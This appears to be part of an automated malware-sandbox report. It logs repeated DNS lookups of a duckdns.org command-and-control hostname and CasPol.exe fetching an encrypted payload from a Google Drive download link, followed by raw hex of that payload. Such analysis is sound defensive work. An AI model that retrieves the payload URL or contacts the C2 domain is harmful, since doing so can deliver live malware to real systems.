        Jul 5, 2024 07:31:30.881975889 CEST1.1.1.1192.168.11.200x7287Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:35.006261110 CEST1.1.1.1192.168.11.200xc692Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:35.127574921 CEST1.1.1.1192.168.11.200x2a41Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:39.255625963 CEST1.1.1.1192.168.11.200xe0caName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:39.379748106 CEST1.1.1.1192.168.11.200xabbeName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:43.504460096 CEST1.1.1.1192.168.11.200x5126Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:47.628042936 CEST1.1.1.1192.168.11.200xb4fbName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:47.749085903 CEST1.1.1.1192.168.11.200xe49bName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:51.884645939 CEST1.1.1.1192.168.11.200x1f77Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:56.022974014 CEST1.1.1.1192.168.11.200x9a44Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:31:56.144224882 CEST1.1.1.1192.168.11.200x1d8fName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:00.266102076 CEST1.1.1.1192.168.11.200xb18cName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:00.387382984 CEST1.1.1.1192.168.11.200x987Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:04.514986992 CEST1.1.1.1192.168.11.200xf409Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:08.639142036 CEST1.1.1.1192.168.11.200x8a1cName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:08.759867907 CEST1.1.1.1192.168.11.200xb7edName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:12.893454075 CEST1.1.1.1192.168.11.200xd9ffName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:17.027951956 CEST1.1.1.1192.168.11.200xd7c7Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:17.149874926 CEST1.1.1.1192.168.11.200x819aName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:21.288794041 CEST1.1.1.1192.168.11.200x1f6fName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:21.408771038 CEST1.1.1.1192.168.11.200x1fb3Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:25.561734915 CEST1.1.1.1192.168.11.200x7bd6Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:29.699347973 CEST1.1.1.1192.168.11.200x5f10Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:29.820144892 CEST1.1.1.1192.168.11.200x576dName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:33.945964098 CEST1.1.1.1192.168.11.200xac6fName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:38.070930004 CEST1.1.1.1192.168.11.200xeb4dName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:38.191984892 CEST1.1.1.1192.168.11.200x83d6Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:42.320624113 CEST1.1.1.1192.168.11.200x2e3fName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:42.443253994 CEST1.1.1.1192.168.11.200x34e1Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:46.568366051 CEST1.1.1.1192.168.11.200x2693Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:50.693263054 CEST1.1.1.1192.168.11.200xa748Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:50.814826965 CEST1.1.1.1192.168.11.200x628eName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:54.942631006 CEST1.1.1.1192.168.11.200x4e3fName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:59.066215992 CEST1.1.1.1192.168.11.200x7695Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:32:59.186934948 CEST1.1.1.1192.168.11.200xcae0Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:03.314929008 CEST1.1.1.1192.168.11.200xa50eName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:03.435060024 CEST1.1.1.1192.168.11.200xea81Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:07.571460009 CEST1.1.1.1192.168.11.200xbae4Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:11.704462051 CEST1.1.1.1192.168.11.200x48ecName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:11.824981928 CEST1.1.1.1192.168.11.200xceb9Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:15.953139067 CEST1.1.1.1192.168.11.200x7b3bName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:20.079240084 CEST1.1.1.1192.168.11.200x8a42Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:20.200072050 CEST1.1.1.1192.168.11.200x2637Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:24.330147028 CEST1.1.1.1192.168.11.200xc014Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:24.473052979 CEST1.1.1.1192.168.11.200xee0Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:28.606885910 CEST1.1.1.1192.168.11.200x1ea6Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:32.730272055 CEST1.1.1.1192.168.11.200x9542Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:32.850589037 CEST1.1.1.1192.168.11.200x5f65Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:41.698071957 CEST1.1.1.1192.168.11.200x26dcName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:41.824421883 CEST1.1.1.1192.168.11.200xba7bName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:45.946624994 CEST1.1.1.1192.168.11.200x399aName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:50.070390940 CEST1.1.1.1192.168.11.200xeefbName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:50.191128969 CEST1.1.1.1192.168.11.200xdc6Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:54.323664904 CEST1.1.1.1192.168.11.200x4770Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:54.444036961 CEST1.1.1.1192.168.11.200xb40bName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:33:58.568097115 CEST1.1.1.1192.168.11.200x6d5dName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:34:02.692255020 CEST1.1.1.1192.168.11.200x4e3bName error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:34:02.813441038 CEST1.1.1.1192.168.11.200x1a29Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        Jul 5, 2024 07:34:06.941401958 CEST1.1.1.1192.168.11.200x5bd7Name error (3)7fxcmft-olcmjfjxdk.duckdns.orgnonenoneA (IP address)IN (0x0001)false
        • drive.google.com
        • drive.usercontent.google.com
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.11.2049776142.250.191.1104431072C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        TimestampBytes transferredDirectionData
        2024-07-05 05:26:12 UTC216OUTGET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
        Host: drive.google.com
        Cache-Control: no-cache
        2024-07-05 05:26:12 UTC1598INHTTP/1.1 303 See Other
        Content-Type: application/binary
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 05 Jul 2024 05:26:12 GMT
        Location: https://drive.usercontent.google.com/download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download
        Strict-Transport-Security: max-age=31536000
        Cross-Origin-Opener-Policy: same-origin
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Content-Security-Policy: script-src 'nonce-DyjMqX40D6PN0SGBIeG9ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Server: ESF
        Content-Length: 0
        X-XSS-Protection: 0
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Options: nosniff
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Connection: close


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.11.2049777142.250.191.1294431072C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
        TimestampBytes transferredDirectionData
        2024-07-05 05:26:12 UTC258OUTGET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
        2024-07-05 05:26:13 UTC4820INHTTP/1.1 200 OK
        Content-Type: application/octet-stream
        Content-Security-Policy: sandbox
        Content-Security-Policy: default-src 'none'
        Content-Security-Policy: frame-ancestors 'none'
        X-Content-Security-Policy: sandbox
        Cross-Origin-Opener-Policy: same-origin
        Cross-Origin-Embedder-Policy: require-corp
        Cross-Origin-Resource-Policy: same-site
        X-Content-Type-Options: nosniff
        Content-Disposition: attachment; filename="hgqRGiZKF90.bin"
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Credentials: false
        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
        Accept-Ranges: bytes
        Content-Length: 207936
        Last-Modified: Mon, 29 May 2023 21:04:30 GMT
        X-GUploader-UploadID: ACJd0Np94xsYyoumuP628_9phWC_YmkB0Kh1QFCg_8_qtwjbyAwWjuaIYCJeyRMR6maGwOxkdNg
        Date: Fri, 05 Jul 2024 05:26:13 GMT
        Expires: Fri, 05 Jul 2024 05:26:13 GMT
        Cache-Control: private, max-age=0
        X-Goog-Hash: crc32c=M8B4pQ==
        Server: UploadServer
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Connection: close
        2024-07-05 05:26:13 UTC4820INData Raw: ef e3 5b 36 02 22 6a 1e fb 4d 01 08 d2 29 6e 69 82 89 75 e6 24 08 0e 21 04 0c 03 b7 81 34 70 d4 5b fb b6 f1 67 bf ac 98 44 52 a0 59 59 6c ab 41 b9 0b d0 b4 7d 1d 52 ab a9 3e 0b 75 f5 39 1c 12 67 b9 5b 0b 5a d1 2d f3 d1 de ed 8c 64 cb ae 4c f8 be 29 05 cd 39 81 aa a6 cc 32 3a 23 17 43 ee 2c 75 43 04 40 cc 9e 96 a0 0c a4 d5 d5 a6 e4 fc 34 3e e5 8f e4 c5 ca c9 3e a5 2b eb 79 ee ac 50 ed bb b3 a7 8c 43 65 b9 f2 5a 7b fc 83 4d d7 4b 18 b7 08 0e 5c f9 c2 38 43 80 71 65 78 d1 8a d4 44 1b a7 74 62 cc 11 3e 88 34 14 02 51 14 aa e2 75 67 d0 65 19 e8 af 1d 95 eb ea 1d 61 82 c1 21 27 ce 21 af 1f 01 f8 a0 1c 92 84 21 f8 a8 32 02 06 11 ee b4 ee b8 53 7a 2a 97 39 5a ff 07 16 1e d8 d5 cd b1 b0 93 18 48 50 0e de e9 e0 36 86 69 cf 81 0e c9 64 8b fa 99 18 c8 e6 01 0c a0 2d
        Data Ascii: [6"jM)niu$!4p[gDRYYlA}R>u9g[Z-dL)92:#C,uC@4>>+yPCeZ{MK\8CqexDtb>4Qugea!'!!2Sz*9ZHP6id-
        2024-07-05 05:26:13 UTC4820INData Raw: b3 3b c2 96 b5 0a b4 67 cc c7 3e ff 95 b9 0b 31 db aa 21 09 3b 15 c5 0b a8 dd 2e bc ff b1 b5 e1 ac 53 66 c9 95 66 2a 10 3c 6f 4a 76 36 f1 2b df 35 b8 34 80 a7 64 1b 5d 28 90 b1 0b 59 db 30 de fa f8 e5 e3 e0 34 ae 46 5e 93 01 23 df 39 88 82 87 cd 32 3c 3a 3a 5c c8 0a 67 43 0c 2f b0 9e 96 aa 71 23 d5 d5 a2 ed 93 4d 3e e5 85 e2 ce 14 d5 32 8e e4 e6 d2 38 d1 d8 e3 a4 0d 82 50 df 20 74 d3 e8 6b b4 45 44 e2 23 71 ce f6 7e 29 bc bd 9a 23 fd 51 06 19 bf ec bb 75 76 c5 1e 04 be 64 51 bb 6d 7e 22 45 5b f9 c2 03 08 b4 11 35 96 d8 17 b1 e1 f1 30 6a a4 c6 4e 0a 8b 21 a5 7e 07 d0 a3 b6 9e 9e 63 d2 af 5d 7e 06 11 e4 b7 20 ba 4b 51 26 f9 44 5a ff c5 0a 33 c5 91 c4 99 d1 92 18 4e db c4 c9 cf e8 79 ff 69 cf 8b 0a cd 72 a3 c4 99 18 e2 f0 ff 0d 88 21 f5 dd 85 9c d9 3f 2e 83
        Data Ascii: ;g>1!;.Sff*<oJv6+54d](Y04F^#92<::\gC/q#M>28P tkED#q~)#QuvdQm~"E[50jN!~c]~ KQ&DZ3Nyir!?.
        2024-07-05 05:26:13 UTC238INData Raw: b4 c7 38 dd 56 b0 61 63 ce 80 2d 1c f0 20 eb 00 a5 1f 38 de ad 47 b9 c0 7e 5a 6e 53 84 28 04 10 62 6b 4c 5e e9 f1 2b c4 48 7e ca 95 98 6c 0c 07 26 eb c2 85 ee e3 cf 2d cb fb c5 c0 9b 34 a4 47 47 9e a4 27 1d 27 a9 55 e6 cc 34 12 97 17 43 e8 04 14 43 04 4a 12 9e bc a1 1c a4 d5 d5 a6 f6 fc 67 5b e5 91 a2 c5 ca c8 2d 95 2d eb f8 ef ac 50 cd a4 09 b8 a4 99 6c 74 d5 f4 56 b9 68 6b ba d3 71 c4 28 55 2d 9d 8e bf 25 9e 96 06 19 b5 fd 81 e1 3b c5 11 64 af 61 23 60 5d 7a 28 09 61 33 c2 18 08 92 11 33 f4 a6 78 78 eb ea 17 0e 48 c1 21 7d 86 09 64 53 00 f1 88 cd b5 6d 73 f4 a1 3a 2a 77 11 ee b2 8e fd 5d 7b 25 e8 7a 5a ff cb 3f 37 d9 b7 ca a0 b4 82 1c 27 0b e9 df e3 8f dc 86 69 c5 92 05 d8 6d a3 91 98 18 ee f5 06 1d a5
        Data Ascii: 8Vac- 8G~ZnS(bkL^+H~l&-4GG''U4CCJg[--PltVhkq(U-%;da#`]z(a33xxH!}dSms:*w]{%zZ?7'im
        2024-07-05 05:26:13 UTC1255INData Raw: 3c d8 a6 f6 fb 31 2c 1f f6 b1 de 69 70 30 c7 d3 59 15 52 dd f6 49 b4 7d 77 a7 af 9c 49 3a fe c2 9d 58 6c 7b 6e 57 1b 6c 69 3b 41 87 69 c2 63 b5 8e 4b 64 98 39 9f 3b d7 78 fb f3 56 5d 15 97 31 99 b9 1d a3 6c d6 d3 c7 f5 a0 89 9b 3b ba 61 17 a1 db b5 db 58 9f c2 79 66 13 05 ad 93 12 41 aa 6d 63 53 5a 35 ed 9d 44 11 0c e3 d9 12 de ec f2 fb 4b 87 88 ae 72 93 72 ce 81 37 e4 c7 05 9f b9 c5 7a 18 e7 5a b1 11 9b e5 60 44 27 36 de 41 9c 43 09 2c 36 bb c2 24 b7 ba f9 70 27 d8 01 bf a8 ee 12 d1 85 3c 6d 6b 19 1e 6c a9 05 58 26 6c e7 68 fe 95 35 cf 39 7a 8d e6 2d fd 9c 17 44 c9 6a c6 ad bd de 89 3d 01 57 57 7a c7 1c 67 74 b2 0d 0c e0 f6 9a ff cf a4 cc 47 06 a8 53 7d c5 8e b3 49 3d 61 77 20 60 93 c1 35 27 3b 24 53 a4 d1 28 db 22 80 6f 53 ab 62 7c b6 4a 45 f2 dc 16 fa
        Data Ascii: <1,ip0YRI}wI:Xl{nWli;AicKd9;xV]1l;aXyfAmcSZ5DKrr7zZ`D'6AC,6$p'<mklX&lh59z-Dj=WWzgtGS}I=aw `5';$S("oSb|JE
        2024-07-05 05:26:13 UTC68INData Raw: 2a 8c 19 80 7f ea f4 be 0c 6e 96 31 9e e5 50 89 12 ac c4 9e e6 d4 03 c1 af ba 60 02 80 cf 9b 5e 00 8c c2 42 61 02 03 bf a9 0d 50 b5 e3 d4 7b 96 35 ed 97 7d 27 25 8f df 3f d9 d7 d2 84 27 87 8e b0 48 bb 47
        Data Ascii: *n1P`^BaP{5}'%?'HG
        2024-07-05 05:26:13 UTC1255INData Raw: e1 9f 35 e7 38 fa 8c 83 d5 77 e6 18 a3 8a 3a b1 f2 48 d1 17 32 d8 07 8f 73 0d 03 19 ba d3 32 82 34 4e 76 56 fb 2d b8 88 cb 1b d6 a3 17 44 1a 32 e9 62 af fc 70 5e 8d 93 c3 fa b8 33 ab 25 61 ab e0 00 ef ba bd 6c 9b 6e dc 8a bc 86 c5 46 01 53 54 2c e0 1c 67 7e b5 16 2d c8 0c 99 26 b0 96 ca 6a 03 85 73 b0 97 8e b9 6b 68 ee 77 26 05 5e d0 4b 1f 21 09 46 85 f1 df 89 22 8a 63 25 0c 85 7c bc 46 70 95 fd 13 f8 40 e3 d4 70 cd 1c 80 f7 fc 33 c9 60 3c 9f c3 0a 18 2a c9 3c 4f 02 de 49 8a 3c bd 28 48 06 57 90 57 a8 50 d0 2d 6b 5a b8 13 aa 90 35 ed a5 0c e9 47 46 27 d7 ac 3f d7 ae 18 96 74 1a 87 66 81 04 e9 9c 43 e7 82 38 bf 6c 9e 31 2a bc bc 9a 79 0e 68 88 de a9 6d 73 a3 25 18 85 06 d5 31 2b 2f a9 92 21 8e d4 f8 7b fa e5 28 b2 e7 27 18 d6 01 fe 7c db d4 94 50 fa 4c 11
        Data Ascii: 58w:H2s24NvV-D2bp^3%alnFST,g~-&jskhw&^K!F"c%|Fp@p3`<*<OI<(HWWP-kZ5GF'?tfC8l1*yhms%1+/!{('|PL
        2024-07-05 05:26:13 UTC1255INData Raw: 5c 38 db df e5 f8 bd 73 d4 14 67 c4 62 2a ea c2 8b 44 d3 6b c6 a1 de 28 ba 3d 07 55 78 5c 4a 1c 61 11 e0 14 27 e5 fb 99 56 b0 96 ca 28 82 ae 5b 53 91 a6 f8 42 52 e9 18 a4 6b b8 d6 4d 3d 77 25 57 a5 b6 93 88 22 86 4d 70 25 62 7a 90 1d 76 a9 dc 3b 41 7f 19 fe 4a 38 4c ad e9 d4 c6 d5 4d 2e 91 34 47 19 20 a0 c6 4d 2a 2a 54 a7 23 b7 59 1c 00 5b bf bb 85 6b 1d 24 63 1d ca 13 aa 9c 31 ac 8f 0f e3 7e ad 27 f6 ac 3f d7 aa 9c 9f 7c 73 50 51 80 0e e9 ac a8 e7 83 38 b2 23 d8 13 fa a4 92 4f 79 0e 6e 95 81 44 6d ff a9 28 66 ba 06 d5 24 75 9d 8a 42 3b 8b 2a d2 53 fd cc c1 b8 e5 00 12 e0 3a d8 6b c5 d1 03 76 84 cb 37 9c 1a 51 09 7a 73 e9 1d 60 82 0a e0 90 c6 47 c7 48 34 9f 6a b3 91 7d 31 07 ff 45 dc 8f e6 f6 39 67 00 00 fe 73 01 82 13 a9 01 2e 93 41 3b 86 04 f5 5c 77 d0
        Data Ascii: \8sgb*Dk(=Ux\Ja'V([SBRkM=w%W"Mp%bzv;AJ8LM.4G M**T#Y[k$c1~'?|sPQ8#OynDm(f$uB;*S:kv7Qzs`GH4j}1E9gs.A;\w
        2024-07-05 05:26:13 UTC1255INData Raw: 69 53 f3 77 20 6a b8 c4 4b 53 61 24 77 e5 d9 00 88 20 80 71 3c 42 18 7c b6 4c 5d aa d6 0b c3 6f 0e 5c 50 1e 3f 15 e9 d4 dd e1 f6 3a b7 1a 26 1d fd 24 d4 4f 02 aa 65 a7 29 9f 7e 27 07 57 9e 77 7d 40 f7 27 4d 0c 04 13 aa 92 31 73 8e 0f e3 41 b6 71 39 ac 3f d9 ae 91 97 74 16 87 8e 80 04 e5 db f6 e7 82 3c 90 5d 4c 12 f0 dc 86 64 79 04 10 a1 b1 41 69 64 c6 c5 66 fa 0c cf 18 18 c0 8c 3c 40 a6 2b fc 05 cd cd c1 b6 88 3e 10 f6 1b 07 5b d1 d7 f2 75 d2 06 37 9c 14 56 39 70 55 f4 15 d0 a7 da f8 a0 14 4d e1 49 0a 05 5b 98 91 5f 7b e3 f4 64 f6 ac 68 f9 0f 53 28 fe ee 73 07 85 9f e5 01 44 f8 69 43 c0 04 ff 2e 18 e0 c4 88 83 47 86 57 fa a7 f1 1e 46 7a 3a 24 89 a9 74 8a 4c 95 cb 76 e7 00 41 c5 af 8a 42 3e e8 7a 51 ec d4 10 73 96 8a 8a 61 92 57 1f c5 99 dd 37 fe b1 cb a4
        Data Ascii: iSw jKSa$w q<B|L]o\P?:&$Oe)~'Ww}@'M1sAq9?t<]LdyAidf<@+>[u7V9pUMI[_{dhS(sDiC.GWFz:$tLvAB>zQsaW7
        2024-07-05 05:26:13 UTC1255INData Raw: 08 0a 58 8f 65 9b 56 3d 2e 36 94 5f 82 9e f7 07 68 7e 34 03 aa 96 19 e2 8e 0f 6c e5 af 03 4e ac 3f dc 95 ab 92 74 50 af 51 80 4d ef a5 d6 99 fc 38 b8 48 4f 32 6b 84 44 7b 51 f1 6e 8e b7 69 84 73 a9 22 4e 52 06 d5 3f 11 cb 81 64 39 8e 85 f8 7b f6 e0 ca 99 e4 27 3a 05 6f a6 7c db f6 33 56 d2 e5 37 9c 14 66 3f 69 73 f5 28 87 88 2c e1 9e 71 39 4a 4f 22 b0 71 93 bc 83 01 d3 f0 6e 66 af 63 d2 d7 79 28 ee 80 0d 07 85 9b e7 21 bf b4 b9 79 ae fb ff 2f 05 f8 29 88 18 4d ae ff bc a7 fb 11 15 61 1d 22 ab dd 5a 8a 46 4f fb 13 21 f5 64 e7 fb a7 53 12 f4 29 36 ca d3 34 fd df b4 94 49 67 7b 0f e8 b2 63 1c 13 b1 9d ba 57 2c 25 48 fe ad c7 0c d9 32 89 87 5e ff f7 1f 7e 65 48 dd dc 67 7e 69 17 ac 45 ff 46 c5 61 35 a0 0f 88 01 34 f5 39 dd 4d 9a c5 08 dc cc c5 94 e2 16 be 5c
        Data Ascii: XeV=.6_h~4lN?tPQM8HO2kD{Qnis"NR?d9{':o|3V7f?is(,q9JO"qnfcy(!y/)Ma"ZFO!dS)64Ig{cW,%H2^~eHg~iEFa549M\
        2024-07-05 05:26:13 UTC1255INData Raw: 12 fa b3 97 0a 59 0f 6e 84 91 73 4b a3 b7 00 99 fa 06 d3 5a 2a e7 8a 48 13 8a 55 b5 7b fc c9 ec a5 99 1a 11 f6 15 f1 5e da fc 13 47 d7 49 11 b7 19 ce 59 68 73 f7 1e aa fc 47 e6 88 ef 54 cc 4c 04 6f 70 92 bc 8c c4 c7 d1 46 64 af 63 d8 f3 54 30 d9 f9 53 20 a3 4f fb 29 d1 92 69 61 ae b0 ff 2f 05 f8 a1 88 18 4d 58 54 b7 8c 17 1b 12 6e 11 fa 8d c5 5a 9a 4c 91 dc 19 0a 00 04 8a b7 83 15 18 ee 05 2d dc de 14 40 f9 64 8a 61 98 7b 0f ce 47 f0 cc 0d 9f 4a db 57 2a 2c 80 e8 8b fe cc f7 39 b4 ab 41 d9 df b2 7e 65 42 dc 40 67 5a 29 3d 8a 6f 08 50 ea 8e 9c bb 3f 8c 4b ae f5 28 a3 4a 9a c5 1d b4 da cc b2 e1 07 be 5c 98 a3 15 92 55 1f 9b e4 d6 1d 4b bd e8 d4 7b 9d 09 de 59 53 bb fe c0 37 80 f9 26 47 af 16 00 a8 75 a3 9b bb 08 69 b6 7a 8a c8 f4 1a a9 44 1b 3a 21 d8 ee a8
        Data Ascii: YnsKZ*HU{^GIYhsGTLopFdcT0S O)ia/MXTnZL-@da{GJW*,9A~eB@gZ)=oP?K(J\UK{YS7&GuizD:!


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:01:25:03
        Start date:05/07/2024
